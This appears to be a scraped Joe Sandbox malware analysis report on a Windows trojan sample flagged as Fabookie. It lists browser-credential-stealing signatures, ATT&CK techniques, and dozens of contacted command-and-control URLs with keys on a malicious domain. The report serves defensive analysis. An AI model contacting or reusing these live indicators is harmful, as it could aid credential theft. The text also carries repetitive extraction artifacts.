table of contents 2 windows analysis report 7ppxbfdkrn 3

58
ID: 508206 Sample Name: 7PPXbfDkRN Cookbook: default.jbs Time: 09:45:12 Date: 24/10/2021 Version: 33.0.0 White Diamond

Upload: others

Post on 26-May-2022

1 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

ID: 508206Sample Name: 7PPXbfDkRNCookbook: default.jbsTime: 09:45:12Date: 24/10/2021Version: 33.0.0 White Diamond

Page 2: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

2333333333333444455666666888999

10101010101011121213131313131313141414141414

141414141418242458585858585858

585858

5858

Table of Contents

Table of ContentsWindows Analysis Report 7PPXbfDkRN

OverviewGeneral InformationDetectionSignaturesClassification

Process TreeMalware ConfigurationYara OverviewSigma OverviewJbx Signature Overview

AV Detection:Networking:Stealing of Sensitive Information:

Mitre Att&ck MatrixBehavior GraphScreenshots

ThumbnailsAntivirus, Machine Learning and Genetic Malware Detection

Initial SampleDropped FilesUnpacked PE FilesDomainsURLs

Domains and IPsContacted DomainsContacted URLsURLs from Memory and BinariesContacted IPsPublicPrivate

General InformationSimulations

Behavior and APIsJoe Sandbox View / Context

IPsDomainsASNJA3 FingerprintsDropped Files

Created / dropped FilesStatic File Info

GeneralFile IconStatic PE Info

GeneralEntrypoint PreviewData DirectoriesSectionsResourcesImportsPossible Origin

Network BehaviorNetwork Port DistributionTCP PacketsUDP PacketsDNS QueriesDNS AnswersHTTP Request Dependency GraphHTTP Packets

Code ManipulationsStatisticsSystem Behavior

Analysis Process: 7PPXbfDkRN.exe PID: 5172 Parent PID: 6124GeneralFile Activities

File Read

Registry ActivitiesKey CreatedKey Value Created

DisassemblyCode Analysis

Copyright Joe Security LLC 2021 Page 2 of 58

Page 3: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Windows Analysis Report 7PPXbfDkRN

Overview

General Information

Sample Name:

7PPXbfDkRN (renamed file extension from none to exe)

Analysis ID: 508206

MD5: 1614d9adfb1903a…

SHA1: cfa0028bb78e1b0…

SHA256: 42de2be8dd54f07…

Tags: exe trojan

Infos:

Most interesting Screenshot:

Detection

Score: 64

Range: 0 - 100

Whitelisted: false

Confidence: 100%

Signatures

Multi AV Scanner detection for subm

Multi AV Scanner detection for subm

Multi AV Scanner detection for subm

Multi AV Scanner detection for subm

Multi AV Scanner detection for subm

Multi AV Scanner detection for subm

Multi AV Scanner detection for submMulti AV Scanner detection for subm……

Multi AV Scanner detection for doma

Multi AV Scanner detection for doma

Multi AV Scanner detection for doma

Multi AV Scanner detection for doma

Multi AV Scanner detection for doma

Multi AV Scanner detection for doma

Multi AV Scanner detection for domaMulti AV Scanner detection for doma……

Tries to harvest and steal browser in

Tries to harvest and steal browser in

Tries to harvest and steal browser in

Tries to harvest and steal browser in

Tries to harvest and steal browser in

Tries to harvest and steal browser in

Tries to harvest and steal browser inTries to harvest and steal browser in……

May check the online IP address of

May check the online IP address of

May check the online IP address of

May check the online IP address of

May check the online IP address of

May check the online IP address of

May check the online IP address of May check the online IP address of ……

Uses a known web browser user age

Uses a known web browser user age

Uses a known web browser user age

Uses a known web browser user age

Uses a known web browser user age

Uses a known web browser user age

Uses a known web browser user ageUses a known web browser user age……

May sleep (evasive loops) to hinder

May sleep (evasive loops) to hinder

May sleep (evasive loops) to hinder

May sleep (evasive loops) to hinder

May sleep (evasive loops) to hinder

May sleep (evasive loops) to hinder

May sleep (evasive loops) to hinder May sleep (evasive loops) to hinder ……

PE file contains sections with non-s

PE file contains sections with non-s

PE file contains sections with non-s

PE file contains sections with non-s

PE file contains sections with non-s

PE file contains sections with non-s

PE file contains sections with non-sPE file contains sections with non-s……

Internet Provider seen in connection

Internet Provider seen in connection

Internet Provider seen in connection

Internet Provider seen in connection

Internet Provider seen in connection

Internet Provider seen in connection

Internet Provider seen in connectionInternet Provider seen in connection……

Sample execution stops while proce

Sample execution stops while proce

Sample execution stops while proce

Sample execution stops while proce

Sample execution stops while proce

Sample execution stops while proce

Sample execution stops while proceSample execution stops while proce……

IP address seen in connection with o

IP address seen in connection with o

IP address seen in connection with o

IP address seen in connection with o

IP address seen in connection with o

IP address seen in connection with o

IP address seen in connection with oIP address seen in connection with o……

Contains long sleeps (>= 3 min)

Contains long sleeps (>= 3 min)

Contains long sleeps (>= 3 min)

Contains long sleeps (>= 3 min)

Contains long sleeps (>= 3 min)

Contains long sleeps (>= 3 min)

Contains long sleeps (>= 3 min)Contains long sleeps (>= 3 min)

Classification

Malware Configuration

Yara Overview

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

AV Detection:

Ransomware

Spreading

Phishing

Banker

Trojan / Bot

Adware

Spyware

Exploiter

Evader

Miner

clean

clean

clean

clean

clean

clean

clean

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

malicious

malicious

malicious

malicious

malicious

malicious

malicious

System is w10x64

7PPXbfDkRN.exe (PID: 5172 cmdline: 'C:\Users\user\Desktop\7PPXbfDkRN.exe' MD5: 1614D9ADFB1903A189E6EFD9B6DC4077)

cleanup

No configs have been found

No yara matches

Process Tree

Copyright Joe Security LLC 2021 Page 3 of 58

Page 4: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Multi AV Scanner detection for submitted file

Multi AV Scanner detection for domain / URL

Networking:

May check the online IP address of the machine

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Mitre Att&ck Matrix

InitialAccess Execution Persistence

PrivilegeEscalation Defense Evasion

CredentialAccess Discovery

LateralMovement Collection Exfiltration

Commandand Control

NetworkEffects

RemoteServiceEffects

ValidAccounts

Commandand ScriptingInterpreter 2

PathInterception

PathInterception

Virtualization/SandboxEvasion 2 1

OSCredentialDumping 1

Security SoftwareDiscovery 1

RemoteServices

Data fromLocalSystem 1

ExfiltrationOver OtherNetworkMedium

Non-ApplicationLayerProtocol 3

Eavesdrop onInsecureNetworkCommunication

RemotelyTrack DeviceWithoutAuthorization

DefaultAccounts

ScheduledTask/Job

Boot orLogonInitializationScripts

Boot orLogonInitializationScripts

Rootkit LSASSMemory

Virtualization/SandboxEvasion 2 1

RemoteDesktopProtocol

Data fromRemovableMedia

ExfiltrationOverBluetooth

ApplicationLayerProtocol 1 3

Exploit SS7 toRedirect PhoneCalls/SMS

RemotelyWipe DataWithoutAuthorization

DomainAccounts

At (Linux) Logon Script(Windows)

LogonScript(Windows)

Obfuscated Files orInformation

SecurityAccountManager

System InformationDiscovery 1

SMB/WindowsAdmin Shares

Data fromNetworkSharedDrive

AutomatedExfiltration

Ingress ToolTransfer 1

Exploit SS7 toTrack DeviceLocation

ObtainDeviceCloudBackups

LocalAccounts

At (Windows) Logon Script(Mac)

LogonScript(Mac)

Binary Padding NTDS Remote SystemDiscovery 1

DistributedComponentObject Model

InputCapture

ScheduledTransfer

ProtocolImpersonation

SIM CardSwap

CloudAccounts

Cron NetworkLogon Script

NetworkLogonScript

Software Packing LSASecrets

System NetworkConfigurationDiscovery 1

SSH Keylogging DataTransferSize Limits

FallbackChannels

ManipulateDeviceCommunication

Behavior Graph

Copyright Joe Security LLC 2021 Page 4 of 58

Page 5: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Behavior GraphID: 508206

Sample: 7PPXbfDkRN

Startdate: 24/10/2021

Architecture: WINDOWS

Score: 64

Multi AV Scanner detectionfor domain / URL

Multi AV Scanner detectionfor submitted file

7PPXbfDkRN.exe

1

started

staticimg.youtuuee.com

45.136.151.102, 49740, 49747, 49751

ENZUINC-US

Latvia

ip-api.com

208.95.112.1, 49735, 80

TUT-ASUS

United States

192.168.2.1

unknown

unknown

May check the onlineIP address of the machine

Tries to harvest andsteal browser information

(history, passwords,etc)

Legend:

Process

Signature

Created File

DNS/IP Info

Is Dropped

Is Windows Process

Number of created Registry Values

Number of created Files

Visual Basic

Delphi

Java

.Net C# or VB.NET

C, C++ or other language

Is malicious

Internet

Hide Legend

ThumbnailsThis section contains all screenshots as thumbnails, including those not shown in the slideshow.

Screenshots

Copyright Joe Security LLC 2021 Page 5 of 58

Page 6: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Source Detection Scanner Label Link

7PPXbfDkRN.exe 36% Virustotal Browse

7PPXbfDkRN.exe 37% Metadefender Browse

7PPXbfDkRN.exe 79% ReversingLabs Win64.Trojan.Fabookie

No Antivirus matches

No Antivirus matches

Source Detection Scanner Label Link

staticimg.youtuuee.com 10% Virustotal Browse

Source Detection Scanner Label Link

staticimg.youtuuee.com/api/?sid=2152857&key=da7c50094c591bee303e6ae40134d365 0% Avira URL Cloud safe

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Copyright Joe Security LLC 2021 Page 6 of 58

Page 7: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

staticimg.youtuuee.com/api/?sid=2150673&key=240dac36d4da93b289eb9fc9b1dbf3cf 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2153401&key=9ed37d9c1beee98f6d8f22f1a64c1654 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2154697&key=640de8d1cb30960e150a2ae83ccdeee3 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/fbtimemTK0gS 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2152489&key=46f757656210dc4b97f0993898e9f65a 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151471&key=e2e363a560e1822402bad2f0fc58fa96 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2152217&key=f2c0898237d9ba1952d46480d49a59f7 0% Avira URL Cloud safe

staticimg.youtuuee.com//uuG 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149673&key=2f27b215dee998f785c084fa1eb07300ar2t8dvJ 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149915&key=b11dbd658e1f32589d31d99042dd3389 0% Avira URL Cloud safe

staticimg.youtuuee.com/3g 0% Avira URL Cloud safe

staticimg.youtuuee.com/6 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2154731&key=8848854bc680c4541c9c575e1a4771dd 0% Avira URL Cloud safe

staticimg.youtuuee.com/9 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149615&key=2891fe78238bcde026f8e178fbf9a3c7EiKx8jqb 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150263&key=7ead2109b3f290feba66dfab4687cfc7 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150837&key=d83b5cee705da3d2c3bd196ed9680364 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2154533&key=c7fb4ab16edcd802aad73ad31c7a6053 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2155181&key=fa977c193b47e7332ed4283fbaf11d76 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149311&key=51597f4ebba3856d49b8f376ed79ffcd 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149425&key= 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150939&key=ed9790a22aadd1de955b18ce8e9931a9 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2152407&key=0cdc4727b29ccc42a342731a90513a0a 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2155033&key=09d24ce185902446082e2e3ee9d7bd82 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2154027&key=903c4563e00cc833ed3ef11833208a6c 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149847&key=816477b8c4004734b59828b80296cf07 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2153485&key=d713bae4f654cdc874d728df40de994d 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2155417&key=140fb8c1fe3a3339fbd5b964512b26dd 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2152915&key=fab7042d902b81d3499e2f4812a82abb 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151395&key=908b7d52946ed1fe1b4d90f6042b182f 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2153821&key=51f95ef46d0bfa46b8bd60b850c9ef78 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2154771&key=39e47a01daa083a1bd270f910ef0c9eb 0% Avira URL Cloud safe

https://fs.microsoft.ctaticimg.youtuuee.com/ 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2155141&key=fd9f29291b5effe4cbd7ba5ef31627f6 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151781&key=2347a6563ff4775fdef52ecb52801f89 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150019&key=6c4543fee94c34490cafe241dae1f023 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2152791&key=8ab1ecd282ed1eec8035cb128b32dcbc 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2154447&key=74749e2b6b426fd444378aa2fe85023e 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2154923&key=9c5411d2083705cefd42a032d0af03c8 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2152259&key=e090c5963155784f601aef37e72b8873 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2154577&key=a6f9c82a9ee2fd0716c7716cef678bae 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151913&key=ca8ab25ac24d85f5f40e19c69d4c0dfb 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150867&key=063d31afe0e24621c7d74dbaf75408d0 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149773&key=a33cb0101d3e27c4b8d501900e5403c9 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151515&key=9fd25806a58ec606eef9d15c62732749 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2153857&key=2ec8639a3f63f83a5b785e6b27289827 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2152065&key=6e090913b5ff6772b6ebfb09eec40122 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151661&key=767058d62f3520060a4251b422d4f0f8 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2153625&key=b4deabba4c5567e2603bf9b7d8f17999 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151095&key=7c9887cd3cb16aeb568a33c9ccd8c538 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2153999&key=b11b5edba1e160c5872142eebf4cfbe8 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150263&key=7ead2109b3f290feba66dfab4687cfc7indexOcuq 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151889&key=9e57839762ecfd044ae54467558e2d13 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2154653&key=5b951c7a4795ce5831e26305741392a3 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2155331&key=2a33ceba8682c9df2dc341f9116a5d27 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149673&key=2f27b215dee998f785c084fa1eb073000xi1KYLi 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150479&key=d26e2d32e64af0304786124de837af72_1 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151737&key=07322b52521c878f34088a3488e7da0f 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2155219&key=36de31bf0ba525db67e8f20ac8f7fbbd 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150597&key= 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151681&key=c0f5fc90e1facbe18dc9329914865053 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2154341&key=fa9c36a867d6c3269aa994d674f7a30e 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151823&key=5d19a03d12572a7a7c0dc25bffa6153c 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2153961&key=59601c765eacbdd03ac8b15bf80559c8 0% Avira URL Cloud safe

Source Detection Scanner Label Link

Copyright Joe Security LLC 2021 Page 7 of 58

Page 8: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

staticimg.youtuuee.com/api/?sid=2153277&key=0480e5d02c2e53a64a3a2004650f080f 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150093&key=6e5de35b796142fbcf8f6d325b0400186 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2152759&key=777c898c3c029604650c15ae6fd7c451 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149215&key=bd3cb4debade8ca1e0a19fe2ed18b376v 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/fbtime5Hw0y/ 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2153183&key=471088d8ebbf6311129660d9a5495f81 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150543&key=dc8b6a39192685a24adf63edb72eaa2f: 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150479&key=d26e2d32e64af0304786124de837af72~ 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/fbtime0u0uS& 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2152699&key=e8f15d7590fcf56448c8afde3920b962 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150371&key=814316fb83cc23ea4f6bee56f3d3e033 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151265&key=03d3bf4050b9f515c87ca732bd77f2cf 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151983&key=8933f8157c9ae9d3a58a888149c944c9 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151705&key=beddfc0f604b817684e375cfb227d46e 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=21503 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2152097&key=40940a04fb97562c1b7b50b22dc712b8 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150479&key=d26e2d32e64af0304786124de837af72r 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149673&key=2f27b215dee998f785c084fa1eb07300wnAsZ/rG 0% Avira URL Cloud safe

staticimg.youtuuee.com/e 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2151177&key=a71f58dbe888f846ae5846e444e1e656 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149915&key=b11dbd658e1f32589d31d99042dd3389W1S79c7Mj

0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2153055&key=0999538dd8bd04a8657fda92ed9b60bf 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149425&key=2975b649e6fdf9d69b74a57abb0bc8dd2020 0% Avira URL Cloud safe

staticimg.youtuuee.com/n 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150431&key=8566e456c914f2b7c1956cb023b47cdb 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150329&key=e265996d76c1500e0649f58ac61c7690 0% Avira URL Cloud safe

staticimg.youtuuee.com/r 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2153767&key=1e49078a3c3e77f99bedd39b8f4a4a7d 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149425&key=2975b649e6fdf9d69b74a57abb0bc8ddsg 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150597&key=f556d9b1b3eb13930c8eb84fd2c75d69t9uY4I3zy 0% Avira URL Cloud safe

staticimg.youtuuee.com/D 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2149343&key=522b94416aa18897bef2f92ed75a7b55kg 0% Avira URL Cloud safe

staticimg.youtuuee.com/api/?sid=2150735&key=141effec60248e2d310c38549aec1135 0% Avira URL Cloud safe

Source Detection Scanner Label Link

Name IP Active Malicious Antivirus Detection Reputation

ip-api.com 208.95.112.1 true false high

staticimg.youtuuee.com 45.136.151.102 true true 10%, Virustotal, Browse unknown

Name Malicious Antivirus Detection Reputation

staticimg.youtuuee.com/api/?sid=2152857&key=da7c50094c591bee303e6ae40134d365 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2150673&key=240dac36d4da93b289eb9fc9b1dbf3cf true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2153401&key=9ed37d9c1beee98f6d8f22f1a64c1654 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2154697&key=640de8d1cb30960e150a2ae83ccdeee3 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2152489&key=46f757656210dc4b97f0993898e9f65a true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151471&key=e2e363a560e1822402bad2f0fc58fa96 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2152217&key=f2c0898237d9ba1952d46480d49a59f7 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2149915&key=b11dbd658e1f32589d31d99042dd3389 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2154731&key=8848854bc680c4541c9c575e1a4771dd true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2150263&key=7ead2109b3f290feba66dfab4687cfc7 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2150837&key=d83b5cee705da3d2c3bd196ed9680364 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2154533&key=c7fb4ab16edcd802aad73ad31c7a6053 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2155181&key=fa977c193b47e7332ed4283fbaf11d76 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2149311&key=51597f4ebba3856d49b8f376ed79ffcd true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2150939&key=ed9790a22aadd1de955b18ce8e9931a9 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2152407&key=0cdc4727b29ccc42a342731a90513a0a true Avira URL Cloud: safe unknown

Domains and IPs

Contacted Domains

Contacted URLs

Copyright Joe Security LLC 2021 Page 8 of 58

Page 9: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

staticimg.youtuuee.com/api/?sid=2155033&key=09d24ce185902446082e2e3ee9d7bd82 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2154027&key=903c4563e00cc833ed3ef11833208a6c true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2149847&key=816477b8c4004734b59828b80296cf07 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2153485&key=d713bae4f654cdc874d728df40de994d true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2155417&key=140fb8c1fe3a3339fbd5b964512b26dd true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2152915&key=fab7042d902b81d3499e2f4812a82abb true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151395&key=908b7d52946ed1fe1b4d90f6042b182f true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2153821&key=51f95ef46d0bfa46b8bd60b850c9ef78 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2154771&key=39e47a01daa083a1bd270f910ef0c9eb true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2155141&key=fd9f29291b5effe4cbd7ba5ef31627f6 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151781&key=2347a6563ff4775fdef52ecb52801f89 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2150019&key=6c4543fee94c34490cafe241dae1f023 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2152791&key=8ab1ecd282ed1eec8035cb128b32dcbc true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2154447&key=74749e2b6b426fd444378aa2fe85023e true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2154923&key=9c5411d2083705cefd42a032d0af03c8 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2152259&key=e090c5963155784f601aef37e72b8873 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2154577&key=a6f9c82a9ee2fd0716c7716cef678bae true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151913&key=ca8ab25ac24d85f5f40e19c69d4c0dfb true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2150867&key=063d31afe0e24621c7d74dbaf75408d0 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2149773&key=a33cb0101d3e27c4b8d501900e5403c9 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151515&key=9fd25806a58ec606eef9d15c62732749 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2153857&key=2ec8639a3f63f83a5b785e6b27289827 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2152065&key=6e090913b5ff6772b6ebfb09eec40122 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151661&key=767058d62f3520060a4251b422d4f0f8 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2153625&key=b4deabba4c5567e2603bf9b7d8f17999 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151095&key=7c9887cd3cb16aeb568a33c9ccd8c538 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2153999&key=b11b5edba1e160c5872142eebf4cfbe8 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151889&key=9e57839762ecfd044ae54467558e2d13 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2154653&key=5b951c7a4795ce5831e26305741392a3 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2155331&key=2a33ceba8682c9df2dc341f9116a5d27 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151737&key=07322b52521c878f34088a3488e7da0f true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2155219&key=36de31bf0ba525db67e8f20ac8f7fbbd true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151681&key=c0f5fc90e1facbe18dc9329914865053 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2154341&key=fa9c36a867d6c3269aa994d674f7a30e true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151823&key=5d19a03d12572a7a7c0dc25bffa6153c true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2153961&key=59601c765eacbdd03ac8b15bf80559c8 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2153277&key=0480e5d02c2e53a64a3a2004650f080f true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2152759&key=777c898c3c029604650c15ae6fd7c451 true Avira URL Cloud: safe unknown

ip-api.com/json/ false high

staticimg.youtuuee.com/api/?sid=2153183&key=471088d8ebbf6311129660d9a5495f81 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2152699&key=e8f15d7590fcf56448c8afde3920b962 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2150371&key=814316fb83cc23ea4f6bee56f3d3e033 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151265&key=03d3bf4050b9f515c87ca732bd77f2cf true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151983&key=8933f8157c9ae9d3a58a888149c944c9 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151705&key=beddfc0f604b817684e375cfb227d46e true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2152097&key=40940a04fb97562c1b7b50b22dc712b8 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2151177&key=a71f58dbe888f846ae5846e444e1e656 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2153055&key=0999538dd8bd04a8657fda92ed9b60bf true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2150431&key=8566e456c914f2b7c1956cb023b47cdb true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2150329&key=e265996d76c1500e0649f58ac61c7690 true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2153767&key=1e49078a3c3e77f99bedd39b8f4a4a7d true Avira URL Cloud: safe unknown

staticimg.youtuuee.com/api/?sid=2150735&key=141effec60248e2d310c38549aec1135 true Avira URL Cloud: safe unknown

Name Malicious Antivirus Detection Reputation

IP Domain Country Flag ASN ASN Name Malicious

208.95.112.1 ip-api.com United States 53334 TUT-ASUS false

45.136.151.102 staticimg.youtuuee.com Latvia 18978 ENZUINC-US true

URLs from Memory and Binaries

Contacted IPs

Public

Copyright Joe Security LLC 2021 Page 9 of 58

Page 10: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

General Information

Joe Sandbox Version: 33.0.0 White Diamond

Analysis ID: 508206

Start date: 24.10.2021

Start time: 09:45:12

Joe Sandbox Product: CloudBasic

Overall analysis duration: 0h 5m 56s

Hypervisor based Inspection enabled: false

Report type: light

Sample file name: 7PPXbfDkRN (renamed file extension from none to exe)

Cookbook file name: default.jbs

